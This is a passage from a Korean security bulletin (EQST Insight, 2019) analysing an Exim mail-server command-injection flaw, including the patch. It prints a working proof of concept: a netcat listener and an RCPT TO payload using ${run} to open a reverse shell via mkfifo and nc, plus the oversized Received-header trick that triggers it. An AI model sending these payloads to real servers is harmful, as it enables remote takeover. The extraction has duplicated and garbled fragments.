31 1) 원격 (Remote) 에서 PoC 테스트수행 공격자 PC 에서 netcat 으로특정포트 (10149) 를 OPEN 하여 LISTEN 상태로대기한다. [netcat 포트 (10149) OPEN] 공격자 PC 에서 exploit.sh 파일을실행한다. 피해자 PC 와연결되어처리되는송 / 수신데이터를확인가능하며, 수신자정보 (RCPT TO) 값으로명령어구문이설정된것을알수있다. [exploit.sh 실행 ] EQST insight 29

$문자열확장에서 $ 는확장문자열로, \ 은이스케이프문자로 처리되고그외에는그대로복사되어사용된다. 2) Exim 확장항목 ${run} ${run<command> <args>} {<string1>}{<string2>}} 명령 (command) 과인수 (args) 는먼저하나의문자열로확장된다.$

32 공격자 PC 에서 netcat 으로대기중인포트 (15107) 에피해자 PC 의쉘이출력된다. [ 원격 PoC 테스트성공 ] 취약점상세분석 Step 1. Exim 기능 1) Exim 의문자열확장 (String expansions) 사용자입력값이확장을통해처리되고, 처리된결과값으로명령어를수행한다. Exim 또한런타임구성의 많은문자열이사용되기전에처리된다. 문자열확장에서 $ 는확장문자열로, \ 은이스케이프문자로 처리되고그외에는그대로복사되어사용된다. 2) Exim 확장항목 ${run} ${run<command> <args>} {<string1>}{<string2>}} 명령 (command) 과인수 (args) 는먼저하나의문자열로확장된다. 문자열은공백으로개별인수로분리된다음 명령은별도의프로세스로실행되지만동일한 uid 및 gid 에서실행된다. Exim 에서다른명령을실행할때와 마찬가지로쉘은기본적으로사용되지않는다. 명령에쉘이필요한경우명시적으로작성해야한다. EQST insight 30

33 Step 2. 취약점동작원리 취약점동작원리분석을위해취약점테스트시 Exim 서버와송 / 수신한데이터분석을수행한다. 메일메시지작성시작명령어 helo SMTP 프로토콜은인터넷상에서송수신 MTA 사이에서메일을전송할때사용되는인터넷이메일표준 프로토콜이다. helo 는메일전송시작을알리는 SMTP 명령어이다. helo eqst 송신자정보설정명령어 mail from mail from:<> 수신자정보설정명령어 rcpt to 수신자주소 (RCPT TO) 설정시 Exim 확장항목 ${run} 을이용해작성한다. rcpt to: <${run{/bin/sh mkfifo /tmp/test; nc </tmp/test /bin/sh >/tmp/test 2>&1; rm /tmp/test }}@localhost> 이때 \( 백슬래시 ) 를사용하여유효하지않은문자를이스케이프처리한다. rcpt to:<${run{\x2fbin\x2fsh\tc\t\x22mkfifo\x20\x2ftmp\x2ftest\x3b\x20nc\x20192\x2e168\x2e74\x2e168\x \x200 \x3c\x2ftmp\x2ftest\x20\x7c\x20\x2fbin\x2fsh\x20\x3e\x2ftmp\x2ftest\x202\x3e\x261\ x3b\x20\x20rm\x20\x2ftmp\x2ftest\x22}}@localhost> EQST insight 31

34 메일본분설정명령어 DATA receive_header_max 값 ( 기본값 : 30) 이상의 Received : 헤더를설정한다. DATA Received: 1 Received: 2 Received: 3 Received: 4 Received: 5 Received: 6 Received: 7 Received: 8 Received: 9 Received: 10 Received: 11 Received: 12 Received: 13 Received: 14 Received: 15 Received: 16 Received: 17 Received: 18 Received: 19 Received: 20 Received: 21 Received: 22 Received: 23 Received: 24 Received: 25 Received: 26 Received: 27 Received: 28 Received: 29 EQST insight 32

35 Received: 30 Received: 31. Received 헤더를위와같이설정하는이유는다음과같다. deliver_message 함수는메시지가전달될때 호출되며, process_recipients 값은 RECIP_ACCEPT 로기본설정된다. [deliver_message 함수 ] Received 헤더가 31 개로설정되어 received_headers_max( 기본값 :30) 보다커져 else if 제어문조건결과가 참 (True) 이된다. 따라서 process_recipients 값이 RECIP_FAIL_LOOP 로설정된다. [received 헤더값조건문 ] process_recipients 값이 RECIP_FAIL_LOOP 로설정되어, 취약점이발생하는구문을실행되게한다. [process_recipients 값조건문 ] EQST insight 33

$Step 2. 취약한소스코드분석 아래코드에서사용되는 expand_string() 함수는 ${run{<command> <args>}} 확장항목을인식한다.$

36 Step 2. 취약한소스코드분석 아래코드에서사용되는 expand_string() 함수는 ${run{<command> <args>}} 확장항목을인식한다. new address 가전달되는메일의수신자이기때문에, 공격자가전송하는수신자정보 (RCPT TO) 가명령어로 실행된다. [deliver_message 함수 ] expand_string() 함수는 Exim 의문자열확장코드인터페이스이다. [expand_string 함수 ] EQST insight 34

37 Step 3. 패치된소스코드분석 수신자정보 (RCPT TO, new address) 에서유효한주소를추출하는 parse_extract_address 함수가적용되어 공격자가입력한문자열이확장되어처리되지않는다. [deliver.c 소스코드업데이트 ] EQST insight 35

2019.10 INSIGHT 경기도성남시분당구판교로 277번길 23 4&5층 www.

com 발행인 : SK인포섹 EQST Group 제작 : SK인포섹 Marketing팀 c

EQST Insight_201910

EQST Insight_201910 Special Report WannaCryFake 랜섬웨어분석및복호화도구활용 개요 공격자들이금전적이득을위한수단으로랜섬웨어 (Ransomware) 를이용한지수년이지났고그비율도점차감소하고있다. 하지만기존랜섬웨어를변형하여재사용하는변종공격이꾸준히발견되고있어주의가요구된다. 랜섬웨어는몸값을의미하는 Ransom 과 Software 의합성어로, 파일을인질로몸값을요구하며개인